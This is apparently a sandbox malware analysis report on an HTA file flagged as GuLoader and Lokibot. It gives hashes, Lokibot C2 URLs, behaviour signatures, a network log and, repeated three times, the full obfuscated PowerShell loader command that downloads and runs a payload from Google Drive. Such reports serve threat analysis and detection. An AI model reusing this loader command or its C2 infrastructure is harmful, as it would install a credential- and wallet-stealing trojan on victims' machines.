Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

LV24-0926.hta

windows7-x64

10

LV24-0926.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/09/2024, 11:26 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LV24-0926.hta

  • Size

    7KB

  • MD5

    b604a446f056b778a22cf7ea6a6676ae

  • SHA1

    c198b474688cc106f9fc06cc6b9e569613f5e689

  • SHA256

    3023bc189f377a809d054529454fa9e35af817f3c9c3646c15d2d4da468676bf

  • SHA512

    4f54f91862b9fe8494cefbca8dae42cc930839206508fae41e0d3688b12a5e7bafa1eb0da6369daaa77af6db62cac02360b217a1a090a904b3a2720cdd6edd4e

  • SSDEEP

    192:hlN6ZVy2gAkJkhRg9e+UEmOVYpUVM2vy6n2MbIv:hqZVy2COhDNG1v9LIv

Score
10/10
guloaderlokibotcollectiondiscoverydownloaderspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\LV24-0926.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2632
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1388

Network

  • flag-us
    DNS
    drive.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    142.250.187.206
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG
    powershell.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 27 Sep 2024 11:26:55 GMT
    Location: https://drive.usercontent.google.com/download?id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-8XdcUToIMKvzjXPSliWePw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    drive.usercontent.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    172.217.16.225
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG&export=download
    powershell.exe
    Remote address:
    172.217.16.225:443
    Request
    GET /download?id=1Z5dXtPVzuW1B8Q9l6LMc8FraroZZRJAG&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Manons.prx"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, 